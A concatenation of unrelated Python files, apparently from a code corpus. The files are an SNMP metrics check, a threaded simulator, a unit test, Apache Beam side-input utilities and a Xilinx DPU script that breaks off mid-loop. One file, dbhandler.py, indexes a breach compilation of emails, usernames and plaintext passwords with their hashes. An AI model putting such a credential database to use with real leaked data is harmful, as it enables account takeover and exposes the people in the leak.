# iso.3.6.1.2.1.25.4.2.1.7.224 = INTEGER: 2
# SOLUTION: perform a snmpget command and fallback with snmpgetnext if not found
error = None
first_oid = 0
all_binds = []
while first_oid < len(oids):
try:
oids_batch = oids[first_oid : first_oid + self.oid_batch_size]
self.log.debug('Running SNMP command get on OIDS %s', oids_batch)
error_indication, error_status, _, var_binds = next(
config.call_cmd(hlapi.getCmd, *oids_batch, lookupMib=enforce_constraints)
)
self.log.debug('Returned vars: %s', var_binds)
self.raise_on_error_indication(error_indication, config.ip_address)
missing_results = []
for var in var_binds:
result_oid, value = var
if reply_invalid(value):
oid_tuple = result_oid.asTuple()
missing_results.append(hlapi.ObjectType(hlapi.ObjectIdentity(oid_tuple)))
else:
all_binds.append(var)
if missing_results:
# If we didn't catch the metric using snmpget, try snmpnext
# Don't walk through the entire MIB, stop at end of table
self.log.debug('Running SNMP command getNext on OIDS %s', missing_results)
binds_iterator = config.call_cmd(
hlapi.nextCmd,
*missing_results,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
# if we fail move onto next batch
first_oid += self.oid_batch_size
return all_binds, error
def fetch_sysobject_oid(self, config):
"""Return the sysObjectID of the instance."""
# Reference sysObjectID directly, see http://oidref.com/1.3.6.1.2.1.1.2
oid = hlapi.ObjectType(hlapi.ObjectIdentity((1, 3, 6, 1, 2, 1, 1, 2)))
self.log.debug('Running SNMP command on OID %r', oid)
error_indication, _, _, var_binds = next(config.call_cmd(hlapi.nextCmd, oid, lookupMib=False))
self.raise_on_error_indication(error_indication, config.ip_address)
self.log.debug('Returned vars: %s', var_binds)
return var_binds[0][1].prettyPrint()
def _profile_for_sysobject_oid(self, sys_object_oid):
"""Return, if any, a matching profile for sys_object_oid.
If several profiles match, it will return the longer match, ie the
closest one to the sys_object_oid.
"""
oids = [oid for oid in self.profiles_by_oid if fnmatch.fnmatch(sys_object_oid, oid)]
oids.sort()
if not oids:
raise ConfigurationError('No profile matching sysObjectID {}'.format(sys_object_oid))
return self.profiles_by_oid[oids[-1]]
def _consume_binds_iterator(self, binds_iterator, config):
all_binds = []
error = None
for error_indication, error_status, _, var_binds_table in binds_iterator:
self.log.debug('Returned vars: %s', var_binds_table)
self.raise_on_error_indication(error_indication, config.ip_address)
if error_status:
message = '{} for instance {}'.format(error_status.prettyPrint(), config.ip_address)
error = message
# submit CRITICAL service check if we can't connect to device
if 'unknownUserName' in message:
self.log.error(message)
else:
self.warning(message)
all_binds.extend(var_binds_table)
return all_binds, error
def _start_discovery(self):
cache = read_persistent_cache(self.check_id)
if cache:
hosts = json.loads(cache)
for host in hosts:
try:
ipaddress.ip_address(host)
except ValueError:
write_persistent_cache(self.check_id, json.dumps([]))
break
instance = self.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = self._build_config(instance)
self._config.discovered_instances[host] = host_config
self._thread = threading.Thread(target=self.discover_instances, name=self.name)
self._thread.daemon = True
self._thread.start()
def check(self, instance):
"""
Perform two series of SNMP requests, one for all that have MIB associated
and should be looked up and one for those specified by oids.
"""
config = self._config
if self._config.ip_network:
if self._thread is None:
self._start_discovery()
for host, discovered in list(config.discovered_instances.items()):
if self._check_with_config(discovered):
config.failing_instances[host] += 1
if config.failing_instances[host] >= config.allowed_failures:
# Remove it from discovered instances, we'll re-discover it later if it reappears
config.discovered_instances.pop(host)
# Reset the failure counter as well
config.failing_instances.pop(host)
else:
# Reset the counter if not's failing
config.failing_instances.pop(host, None)
tags = ['network:{}'.format(self._config.ip_network)]
tags.extend(config.tags)
self.gauge('snmp.discovered_devices_count', len(config.discovered_instances), tags=tags)
else:
self._check_with_config(config)
def _check_with_config(self, config):
# Reset errors
instance = config.instance
error = table_results = raw_results = None
try:
if not (config.table_oids or config.raw_oids):
sys_object_oid = self.fetch_sysobject_oid(config)
profile = self._profile_for_sysobject_oid(sys_object_oid)
config.refresh_with_profile(self.profiles[profile], self.warning, self.log)
if config.table_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.table_oids))
table_results, error = self.check_table(config, config.table_oids)
self.report_table_metrics(config.metrics, table_results, config.tags)
if config.raw_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.raw_oids))
raw_results, error = self.check_raw(config, config.raw_oids)
self.report_raw_metrics(config.metrics, raw_results, config.tags)
except CheckException as e:
error = str(e)
self.warning(error)
except Exception as e:
if not error:
error = 'Failed to collect metrics for {} - {}'.format(instance['name'], e)
self.warning(error)
finally:
# Report service checks
sc_tags = ['snmp_device:{}'.format(instance['ip_address'])]
sc_tags.extend(instance.get('tags', []))
status = self.OK
if error:
status = self.CRITICAL
if raw_results or table_results:
status = self.WARNING
self.service_check(self.SC_STATUS, status, tags=sc_tags, message=error)
return error
def report_raw_metrics(self, metrics, results, tags):
"""
For all the metrics that are specified as oid,
the conf oid is going to exactly match or be a prefix of the oid sent back by the device
Use the instance configuration to find the name to give to the metric
Submit the results to the aggregator.
"""
for metric in metrics:
if 'OID' in metric:
forced_type = metric.get('forced_type')
queried_oid = metric['OID'].lstrip('.')
if queried_oid in results:
value = results[queried_oid]
else:
for oid in results:
if oid.startswith(queried_oid):
value = results[oid]
break
else:
self.log.warning('No matching results found for oid %s', queried_oid)
continue
name = metric.get('name', 'unnamed_metric')
metric_tags = tags
if metric.get('metric_tags'):
metric_tags = metric_tags + metric.get('metric_tags')
self.submit_metric(name, value, forced_type, metric_tags)
def report_table_metrics(self, metrics, results, tags):
"""
For each of the metrics specified as needing to be resolved with mib,
gather the tags requested in the instance conf for each row.
Submit the results to the aggregator.
"""
for metric in metrics:
forced_type = metric.get('forced_type')
if 'table' in metric:
index_based_tags = []
column_based_tags = []
for metric_tag in metric.get('metric_tags', []):
tag_key = metric_tag['tag']
if 'index' in metric_tag:
index_based_tags.append((tag_key, metric_tag.get('index')))
elif 'column' in metric_tag:
column_based_tags.append((tag_key, metric_tag.get('column')))
else:
self.log.warning('No indication on what value to use for this tag')
for value_to_collect in metric.get('symbols', []):
if value_to_collect not in results:
self.log.debug('Ignoring metric %s from table %s', value_to_collect, metric['table'])
continue
for index, val in iteritems(results[value_to_collect]):
metric_tags = tags + self.get_index_tags(index, results, index_based_tags, column_based_tags)
self.submit_metric(value_to_collect, val, forced_type, metric_tags)
elif 'symbol' in metric:
name = metric['symbol']
if name not in results:
self.log.debug('Ignoring metric %s', name)
continue
result = list(results[name].items())
if len(result) > 1:
self.log.warning('Several rows corresponding while the metric is supposed to be a scalar')
continue
val = result[0][1]
metric_tags = tags + metric.get('metric_tags', [])
self.submit_metric(name, val, forced_type, metric_tags)
elif 'OID' in metric:
pass # This one is already handled by the other batch of requests
else:
raise ConfigurationError('Unsupported metric in config file: {}'.format(metric))
def get_index_tags(self, index, results, index_tags, column_tags):
"""
Gather the tags for this row of the table (index) based on the
results (all the results from the query).
index_tags and column_tags are the tags to gather.
- Those specified in index_tags contain the tag_group name and the
index of the value we want to extract from the index tuple.
cf. 1 for ipVersion in the IP-MIB::ipSystemStatsTable for example
- Those specified in column_tags contain the name of a column, which
could be a potential result, to use as a tage
cf. ifDescr in the IF-MIB::ifTable for example
"""
tags = []
for idx_tag in index_tags:
tag_group = idx_tag[0]
try:
tag_value = index[idx_tag[1] - 1].prettyPrint()
except IndexError:
self.log.warning('Not enough indexes, skipping this tag')
continue
tags.append('{}:{}'.format(tag_group, tag_value))
for col_tag in column_tags:
tag_group = col_tag[0]
try:
tag_value = results[col_tag[1]][index]
except KeyError:
self.log.warning('Column %s not present in the table, skipping this tag', col_tag[1])
continue
if reply_invalid(tag_value):
self.log.warning("Can't deduct tag from column for tag %s", tag_group)
continue
tag_value = tag_value.prettyPrint()
tags.append('{}:{}'.format(tag_group, tag_value))
return tags
def submit_metric(self, name, snmp_value, forced_type, tags=None):
"""
Convert the values reported as pysnmp-Managed Objects to values and
report them to the aggregator.
"""
tags = [] if tags is None else tags
if reply_invalid(snmp_value):
# Metrics not present in the queried object
self.log.warning('No such Mib available: %s', name)
return
metric_name = self.normalize(name, prefix='snmp')
if forced_type:
if forced_type.lower() == 'gauge':
value = int(snmp_value)
self.gauge(metric_name, value, tags)
elif forced_type.lower() == 'percent':
value = total_time_to_temporal_percent(int(snmp_value), scale=1)
self.rate(metric_name, value, tags)
elif forced_type.lower() == 'counter':
value = int(snmp_value)
self.rate(metric_name, value, tags)
elif forced_type.lower() == 'monotonic_count':
value = int(snmp_value)
self.monotonic_count(metric_name, value, tags)
else:
self.warning('Invalid forced-type specified: {} in {}'.format(forced_type, name))
raise ConfigurationError('Invalid forced-type in config file: {}'.format(name))
return
# Ugly hack but couldn't find a cleaner way
# Proper way would be to use the ASN1 method isSameTypeWith but it
# wrongfully returns True in the case of CounterBasedGauge64
# and Counter64 for example
snmp_class = snmp_value.__class__.__name__
if snmp_class in SNMP_COUNTERS:
value = int(snmp_value)
self.rate(metric_name, value, tags)
return
if snmp_class in SNMP_GAUGES:
value = int(snmp_value)
self.gauge(metric_name, value, tags)
return
if snmp_class == 'Opaque':
# Try support for floats
try:
value = float(decoder.decode(bytes(snmp_value))[0])
except Exception:
pass
else:
self.gauge(metric_name, value, tags)
return
# Falls back to try to cast the value.
try:
value = float(snmp_value)
except ValueError:
pass
else:
self.gauge(metric_name, value, tags)
return
self.log.warning('Unsupported metric type %s for %s', snmp_class, metric_name)
|
dbhandler.py | import time
import logging
import threading
from CredentialDatabase.db.connector import DBConnector
from CredentialDatabase.db.creator import DBCreator
from CredentialDatabase.db.fetcher import DBFetcher
from CredentialDatabase.db.inserter import DBInserter
from CredentialDatabase.utils.password import Password
from CredentialDatabase.exceptions import DBIntegrityError
class DBHandler:
""" class DBHandler to provide database actions to subclasses
USAGE:
dbhandler = DBHandler()
"""
def __init__(self, password_db, db_entries_logger=1000, **dbparams):
self.logger = logging.getLogger('CredentialDatabase')
self.logger.info('create class DBHandler')
self.password_db = password_db
if ('host' and 'port' and 'username' and 'password' and 'dbname') in dbparams.keys():
self.db_host = dbparams['host']
self.db_port = dbparams['port']
self.db_username = dbparams['username']
self.db_password = dbparams['password']
self.db_name = dbparams['dbname']
else:
self.logger.error("no database params provided!")
DBConnector.connect_psycopg(host=self.db_host, port=self.db_port, username=self.db_username,
password=self.db_password, dbname=self.db_name, minConn=1, maxConn=39)
# database instances
self.dbcreator = DBCreator()
self.dbfetcher = DBFetcher()
self.dbinserter = DBInserter()
# instances
self.password = Password()
# database schema structure
self.dbstructure = '0123456789abcdefghijklmnopqrstuvwxyz'
self.schema_list = list(self.dbstructure)
self.schema_list.append('symbols')
self.counter_passworddb = 1
self.chars = set('0123456789abcdefghijklmnopqrstuvwxyz')
self.db_entries_logger = db_entries_logger
self.counter = dict()
for i in self.chars:
self.counter.update({i: 1})
self.counter_sym = 1
# threads
self.threads = []
def create_schemas_and_tables(self, remove=False):
""" creates schemas and tables in database
"""
self.logger.info("create schemas and tables in database")
# start threads
for schema in self.schema_list:
if remove:
thread = threading.Thread(target=self.remove_schema_worker, args=(schema,))
else:
thread = threading.Thread(target=self.schema_worker, args=(schema,))
self.threads.append(thread)
thread.start()
for t in self.threads:
t.join()
def schema_worker(self, schema):
""" worker to create the schemas and tables in the database
:param schema: specific schema
"""
self.logger.info("create schema {}".format(schema))
schema_sql = "create schema if not exists \"{}\"".format(schema)
self.dbinserter.sql(sql=schema_sql)
if schema == 'symbols':
if self.password_db:
table_sql = "create table if not exists \"{}\".symbols (password text primary key, length bigint, isNumber boolean, isSymbol boolean, ts text);".format(
schema)
else:
table_sql = "create table if not exists \"{}\".symbols (id bigint primary key, email text, password text, username text, provider text, sha1 varchar(40), sha256 varchar(64), sha512 varchar(128), md5 varchar(32));".format(
schema)
self.dbinserter.sql(sql=table_sql)
else:
for table in self.schema_list:
if self.password_db:
table_sql = "create table if not exists \"{}\".\"{}\" (password text primary key, length bigint, isNumber boolean, isSymbol boolean, ts text);".format(
schema, table)
else:
table_sql = "create table if not exists \"{}\".\"{}\" (id bigint primary key, email text, password text, username text, provider text, sha1 varchar(40), sha256 varchar(64), sha512 varchar(128), md5 varchar(32));".format(
schema, table)
self.dbinserter.sql(sql=table_sql)
def remove_schema_worker(self, schema):
""" worker to remove the schemas and tables in the database
"""
self.logger.info("remove schema {}".format(schema))
drop_schema_sql = "drop schema \"{}\" cascade".format(schema)
self.dbinserter.sql(sql=drop_schema_sql)
def insert_password_db(self, password):
""" inserts password string into database table
:param password: password string
"""
if len(password) > 1:
first_char_password = password[0].lower()
second_char_password = password[1].lower()
length_password = len(password)
isSymbol = self.password.is_symbol(password)
isNumber = self.password.is_number(password)
utc_ts = str(time.time()).split('.')[0]
if (first_char_password in self.chars) and (second_char_password in self.chars):
data = (password, length_password, isNumber, isSymbol, utc_ts)
query_str = "insert into \"{}\".\"{}\"(password, length, isnumber, issymbol, ts) VALUES (%s, %s, %s, %s, %s)".format(
first_char_password, second_char_password)
try:
self.dbinserter.row(sql=query_str, data=data, autocommit=True)
self.counter_passworddb += 1
if (self.counter_passworddb % self.db_entries_logger) == 0:
self.logger.info("Database entry {}: {}".format(self.counter_passworddb, str(data)))
except DBIntegrityError as e:
# self.logger.error(e)
pass
else:
# handle symbols
data = (password, length_password, isNumber, isSymbol, utc_ts)
query_str = "insert into symbols.symbols(password, length, isnumber, issymbol, ts) VALUES (%s, %s, %s, %s, %s)"
try:
self.dbinserter.row(sql=query_str, data=data, autocommit=True)
self.counter_passworddb += 1
if (self.counter_passworddb % self.db_entries_logger) == 0:
self.logger.info("Database entry {}: {}".format(self.counter_passworddb, str(data)))
except DBIntegrityError as e:
# self.logger.error(e)
pass
else:
# password to short
#self.logger.error("password to short for this database structure: {}".format(password))
pass
def insert_breach_db(self, email, password, username, provider):
""" inserts data from the breachcompilation collection into the database
:param email: email string
:param password: password string
:param username: username from email
:param provider: provider from email
:param sha1: sha1 hash
:param sha256: sha256 hash
:param sha512: sha512 hash
:param md5: md5 hash
"""
if len(email) > 1:
first_char_email = email[0].lower()
second_char_email = email[1].lower()
sha1, sha256, sha512, md5 = self.password.generate_hashes(password=password)
if (first_char_email in self.chars) and (second_char_email in self.chars):
data = (self.counter[first_char_email], str(email), str(password), str(username), str(provider), str(sha1), str(sha256), str(sha512), str(md5))
try:
query_str = "insert into \"{}\".\"{}\"(id, email, password, username, provider, sha1, sha256, sha512, md5) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)".format(first_char_email, second_char_email)
self.dbinserter.row(sql=query_str, data=data, autocommit=True)
self.counter[first_char_email] += 1
if (self.counter[first_char_email] % self.db_entries_logger) == 0:
self.logger.info("Database entry {}: {}".format(self.counter[first_char_email], str(data)))
except DBIntegrityError as e:
#self.counter[first_char_email] += 1
self.logger.error(e)
except Exception as e:
# save data which are not inserted
self.logger.error(e)
else:
# handle symbols
data = (self.counter_sym, str(email), str(password), str(username), str(provider), str(sha1), str(sha256), str(sha512), str(md5))
try:
query_str = "insert into symbols.symbols(id, email, password, username, provider, sha1, sha256, sha512, md5) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)"
self.dbinserter.row(sql=query_str, data=data, autocommit=True)
self.counter_sym += 1
if (self.counter_sym % self.db_entries_logger) == 0:
self.logger.info("Database entry {}: {}".format(self.counter_sym, str(data)))
except DBIntegrityError as e:
#self.counter[first_char_email] += 1
self.logger.error(e)
except Exception as e:
# save data which are not inserted
self.logger.error(e)
else:
#self.logger.error("email to short for this database structure: {}".format(email))
pass
|
experiment.py | # -*- coding: utf-8 -*-
"""
lantz.simulators.experiment
~~~~~~~~~~~~~~~~~~~~~~~~~~~
An experiment connecting an actuator and a sensor.
:copyright: 2012 by The Lantz Authors
:license: BSD, see LICENSE for more details.
"""
from threading import Thread, activeCount
from time import sleep
import logging
import queue
from . import fungen, voltmeter, instrument
class StudiedObject(object):
def __init__(self, read_from_actuator):
self.read = read_from_actuator
self.memory = queue.Queue()
self._present_value = 0
def action(self):
in_value = self.read()
self.memory.put(in_value)
if self.memory.empty() or self.memory.qsize()<10:
self._present_value = 0
else:
self._present_value = 0.5*self.memory.get()
def present_value(self):
return self._present_value
class Namespace():
def __init__(self, host, port):
self.host = host
self.port = port
def create_actuator_server(actuator):
logging.info('Creating fungen server')
args = Namespace('localhost', 5678)
actuator_server = instrument.main_tcp(actuator, args)
logging.info('Fungen: interrupt the program with Ctrl-C')
try:
actuator_server.serve_forever()
except KeyboardInterrupt:
logging.info('Fungen: Ending')
finally:
actuator_server.shutdown()
def create_sensor_server(sensor):
logging.info('Creating voltmeter server')
args = Namespace('localhost', 5679)
sensor_server = instrument.main_tcp(sensor, args)
logging.info('Voltmeter: interrupt the program with Ctrl-C')
try:
sensor_server.serve_forever()
except KeyboardInterrupt:
logging.info('Voltmeter: Ending')
finally:
sensor_server.shutdown()
def serve_forever(obj):
try:
while activeCount() == 3:
obj.action()
sleep(0.1)
except KeyboardInterrupt:
logging.info('Experiment: Ending.')
def main():
fg = fungen.SimFunctionGenerator()
obj = StudiedObject(fg.generator_output)
vm = voltmeter.SimVoltmeter(obj.present_value, fg.generator_output)
fthread = Thread(target=create_actuator_server, args=(fg, ))
vthread = Thread(target=create_sensor_server, args=(vm, ))
fthread.daemon = True
vthread.daemon = True
fthread.start()
vthread.start()
sleep(1)
serve_forever(obj)
if __name__ == "__main__":
main()
|
test_generator_runner.py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import threading
from towhee.dataframe import DataFrame
from towhee.dataframe.iterators import MapIterator
from towhee.engine.operator_io import create_reader, create_writer
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.generator_runner import GeneratorRunner
from tests.unittests.mock_operators.generator_operator import generator_operator
def run(runner):
runner.process()
class TestGeneratorRunner(unittest.TestCase):
"""
GeneratorRunner test
"""
def _create_test_obj(self):
input_df = DataFrame('input', [('num', 'int')])
out_df = DataFrame('output', [('sum', 'int')])
writer = create_writer('generator', [out_df])
reader = create_reader(input_df, 'generator', {'num': 0})
runner = GeneratorRunner('test', 0, 'generator_operator', 'main',
'mock_operators', {'num': 1}, [reader], writer)
return input_df, out_df, runner
def test_generator_runner(self):
input_df, out_df, runner = self._create_test_obj()
runner.set_op(generator_operator.GeneratorOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
input_df.put({'num': 10})
input_df.seal()
t.join()
runner.join()
out_df.seal()
it = MapIterator(out_df, True)
res = 0
for item in it:
self.assertEqual(item[0][0], res)
res += 1
self.assertEqual(out_df.size, 10)
self.assertEqual(runner.status, RunnerStatus.FINISHED)
def test_generator_runner_with_multidata(self):
input_df, out_df, runner = self._create_test_obj()
runner.set_op(generator_operator.GeneratorOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
input_df.put({'num': 10})
input_df.put({'num': 5})
input_df.seal()
t.join()
runner.join()
out_df.seal()
self.assertEqual(out_df.size, 15)
self.assertEqual(runner.status, RunnerStatus.FINISHED)
def test_generator_runner_with_multirunners(self):
input_df_1, out_df_1, runner_1 = self._create_test_obj()
out_df_2 = DataFrame('output', [('sum', 'int')])
writer = create_writer('generator', [out_df_2])
reader = create_reader(out_df_1, 'generator', {'num': 0})
runner_2 = GeneratorRunner('test', 0, 'generator_operator', 'main',
'mock_operators', {'num': 1}, [reader], writer)
runner_1.set_op(generator_operator.GeneratorOperator())
t1 = threading.Thread(target=run, args=(runner_1, ))
t1.start()
runner_2.set_op(generator_operator.GeneratorOperator())
t2 = threading.Thread(target=run, args=(runner_2, ))
t2.start()
input_df_1.put({'num': 1})
input_df_1.put({'num': 2})
input_df_1.put({'num': 3})
input_df_1.seal()
t1.join()
runner_1.join()
# In engine, the op_ctx will do it
out_df_1.seal()
t2.join()
runner_2.join()
out_df_2.seal()
self.assertEqual(runner_1.status, RunnerStatus.FINISHED)
self.assertEqual(runner_2.status, RunnerStatus.FINISHED)
self.assertEqual(out_df_2.size, 4)
it = MapIterator(out_df_2, True)
expect = ['1-2', '2-4', '2-5', '2-5']
index = 0
for item in it:
self.assertEqual(item[0][-1].parent_path, expect[index])
index += 1
def test_generator_runner_with_error(self):
input_df, _, runner = self._create_test_obj()
runner.set_op(generator_operator.GeneratorOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
input_df.put({'num': 'error_data'})
runner.join()
self.assertEqual(runner.status, RunnerStatus.FAILED)
if __name__ == '__main__':
unittest.main()
|
sideinputs.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Utilities for handling side inputs."""
from __future__ import absolute_import
import collections
import logging
import queue
import threading
import traceback
from builtins import object
from builtins import range
from apache_beam.coders import observable
from apache_beam.io import iobase
from apache_beam.runners.worker import opcounters
from apache_beam.transforms import window
# This module is experimental. No backwards-compatibility guarantees.
# Maximum number of reader threads for reading side input sources, per side
# input.
MAX_SOURCE_READER_THREADS = 15
# Number of slots for elements in side input element queue. Note that this
# value is intentionally smaller than MAX_SOURCE_READER_THREADS so as to reduce
# memory pressure of holding potentially-large elements in memory. Note that
# the number of pending elements in memory is equal to the sum of
# MAX_SOURCE_READER_THREADS and ELEMENT_QUEUE_SIZE.
ELEMENT_QUEUE_SIZE = 10
# Special element value sentinel for signaling reader state.
READER_THREAD_IS_DONE_SENTINEL = object()
# Used to efficiently window the values of non-windowed side inputs.
_globally_windowed = window.GlobalWindows.windowed_value(None).with_value
_LOGGER = logging.getLogger(__name__)
class PrefetchingSourceSetIterable(object):
"""Value iterator that reads concurrently from a set of sources."""
def __init__(self,
sources,
max_reader_threads=MAX_SOURCE_READER_THREADS,
read_counter=None):
self.sources = sources
self.num_reader_threads = min(max_reader_threads, len(self.sources))
# Queue for sources that are to be read.
self.sources_queue = queue.Queue()
for source in sources:
self.sources_queue.put(source)
# Queue for elements that have been read.
self.element_queue = queue.Queue(ELEMENT_QUEUE_SIZE)
# Queue for exceptions encountered in reader threads; to be rethrown.
self.reader_exceptions = queue.Queue()
# Whether we have already iterated; this iterable can only be used once.
self.already_iterated = False
# Whether an error was encountered in any source reader.
self.has_errored = False
self.read_counter = read_counter or opcounters.NoOpTransformIOCounter()
self.reader_threads = []
self._start_reader_threads()
def add_byte_counter(self, reader):
"""Adds byte counter observer to a side input reader.
Args:
reader: A reader that should inherit from ObservableMixin to have
bytes tracked.
"""
def update_bytes_read(record_size, is_record_size=False, **kwargs):
# Let the reader report block size.
if is_record_size:
self.read_counter.add_bytes_read(record_size)
if isinstance(reader, observable.ObservableMixin):
reader.register_observer(update_bytes_read)
def _start_reader_threads(self):
for _ in range(0, self.num_reader_threads):
t = threading.Thread(target=self._reader_thread)
t.daemon = True
t.start()
self.reader_threads.append(t)
def _reader_thread(self):
# pylint: disable=too-many-nested-blocks
try:
while True:
try:
source = self.sources_queue.get_nowait()
if isinstance(source, iobase.BoundedSource):
for value in source.read(source.get_range_tracker(None, None)):
if self.has_errored:
# If any reader has errored, just return.
return
if isinstance(value, window.WindowedValue):
self.element_queue.put(value)
else:
self.element_queue.put(_globally_windowed(value))
else:
# Native dataflow source.
with source.reader() as reader:
# The tracking of time spend reading and bytes read from side
# inputs is kept behind an experiment flag to test performance
# impact.
self.add_byte_counter(reader)
returns_windowed_values = reader.returns_windowed_values
for value in reader:
if self.has_errored:
# If any reader has errored, just return.
return
if returns_windowed_values:
self.element_queue.put(value)
else:
self.element_queue.put(_globally_windowed(value))
except queue.Empty:
return
except Exception as e: # pylint: disable=broad-except
_LOGGER.error('Encountered exception in PrefetchingSourceSetIterable '
'reader thread: %s', traceback.format_exc())
self.reader_exceptions.put(e)
self.has_errored = True
finally:
self.element_queue.put(READER_THREAD_IS_DONE_SENTINEL)
def __iter__(self):
# pylint: disable=too-many-nested-blocks
if self.already_iterated:
raise RuntimeError(
'Can only iterate once over PrefetchingSourceSetIterable instance.')
self.already_iterated = True
# The invariants during execution are:
# 1) A worker thread always posts the sentinel as the last thing it does
# before exiting.
# 2) We always wait for all sentinels and then join all threads.
num_readers_finished = 0
try:
while True:
try:
with self.read_counter:
element = self.element_queue.get()
if element is READER_THREAD_IS_DONE_SENTINEL:
num_readers_finished += 1
if num_readers_finished == self.num_reader_threads:
return
else:
yield element
finally:
if self.has_errored:
raise self.reader_exceptions.get()
except GeneratorExit:
self.has_errored = True
raise
finally:
while num_readers_finished < self.num_reader_threads:
element = self.element_queue.get()
if element is READER_THREAD_IS_DONE_SENTINEL:
num_readers_finished += 1
for t in self.reader_threads:
t.join()
def get_iterator_fn_for_sources(sources,
max_reader_threads=MAX_SOURCE_READER_THREADS,
read_counter=None):
"""Returns callable that returns iterator over elements for given sources."""
def _inner():
return iter(
PrefetchingSourceSetIterable(
sources,
max_reader_threads=max_reader_threads,
read_counter=read_counter))
return _inner
class EmulatedIterable(collections.Iterable):
"""Emulates an iterable for a side input."""
def __init__(self, iterator_fn):
self.iterator_fn = iterator_fn
def __iter__(self):
return self.iterator_fn()
|
inception_v1_mt.py | """ (c) Copyright 2019 Xilinx, Inc. All rights reserved.
--
-- This file contains confidential and proprietary information
-- of Xilinx, Inc. and is protected under U.S. and
-- international copyright and other intellectual property
-- laws.
--
-- DISCLAIMER
-- This disclaimer is not a license and does not grant any
-- rights to the materials distributed herewith. Except as
-- otherwise provided in a valid license issued to you by
-- Xilinx, and to the maximum extent permitted by applicable
-- law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND
-- WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES
-- AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING
-- BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON-
-- INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and
-- (2) Xilinx shall not be liable (whether in contract or tort,
-- including negligence, or under any other theory of
-- liability) for any loss or damage of any kind or nature
-- related to, arising under or in connection with these
-- materials, including for any direct, or any indirect,
-- special, incidental, or consequential loss or damage
-- (including loss of data, profits, goodwill, or any type of
-- loss or damage suffered as a result of any action brought
-- by a third party) even if such damage or loss was
-- reasonably foreseeable or Xilinx had been advised of the
-- possibility of the same.
--
-- CRITICAL APPLICATIONS
-- Xilinx products are not designed or intended to be fail-
-- safe, or for use in any application requiring fail-safe
-- performance, such as life-support or safety devices or
-- systems, Class III medical devices, nuclear facilities,
-- applications related to the deployment of airbags, or any
-- other applications that could lead to death, personal
-- injury, or severe property or environmental damage
-- (individually and collectively, "Critical
-- Applications"). Customer assumes the sole risk and
-- liability of any use of Xilinx products in Critical
-- Applications, subject only to applicable laws and
-- regulations governing limitations on product liability.
--
-- THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS
-- PART OF THIS FILE AT ALL TIMES.
"""
from ctypes import *
import cv2
import numpy as np
from dnndk import n2cube, dputils
import os
import threading
import time
import sys
l = threading.Lock()
def RunDPU(kernel, img, count):
"""
DPU run function
kernel: dpu kernel
img: image to be run
count : test rounds count
"""
"""Create DPU Tasks from DPU Kernel"""
task = n2cube.dpuCreateTask(kernel, 0)
while count < 1000:
"""Load image to DPU"""
dputils.dpuSetInputImage2(task, KERNEL_CONV_INPUT, img)
"""Get input Tesor"""
tensor = n2cube.dpuGetInputTensor(task, KERNEL_CONV_INPUT)
"""Model run on DPU"""
n2cube.dpuRunTask(task)
"""Get the output tensor size from FC output"""
size = n2cube.dpuGetOutputTensorSize(task, KERNEL_FC_OUTPUT)
"""Get the output tensor channel from FC output"""
channel = n2cube.dpuGetOutputTensorChannel(task, KERNEL_FC_OUTPUT)
softmax = [0 for i in range(size)]
"""Get FC result"""
conf = n2cube.dpuGetOutputTensorAddress(task, KERNEL_FC_OUTPUT)
n2cube.dpuGetTensorData(conf, softmax, size)
"""Get output scale of FC"""
outputScale = n2cube.dpuGetOutputTensorScale(task, KERNEL_FC_OUTPUT)
"""Run softmax"""
n2cube.dpuRunSoftmax(conf, softmax, channel, size // channel, outputScale)
l.acquire()
count = count + threadnum
l.release()
"""Destroy DPU Tasks & free resources"""
n2cube.dpuDestroyTask(task)
global threadnum
threadnum = 0
KERNEL_CONV = "inception_v1_0"
KERNEL_CONV_INPUT = "conv1_7x7_s2"
KERNEL_FC_OUTPUT = "loss3_classifier"
"""
brief Entry for runing GoogLeNet neural network
"""
def main(argv):
"""Attach to DPU driver and prepare for runing"""
n2cube.dpuOpen()
"""Create DPU Kernels for GoogLeNet"""
kernel = n2cube.dpuLoadKernel(KERNEL_CONV)
image_path = "./../common/image_224_224/"
listimage = os.listdir(image_path)
path = os.path.join(image_path, listimage[0])
print("Loading %s" %listimage[0])
img = cv2.imread(path)
threadAll = []
global threadnum
threadnum = int(argv[1])
print("Input thread number is: %d" %threadnum)
time1 = time.time()
for i in range(int(threadnum)):
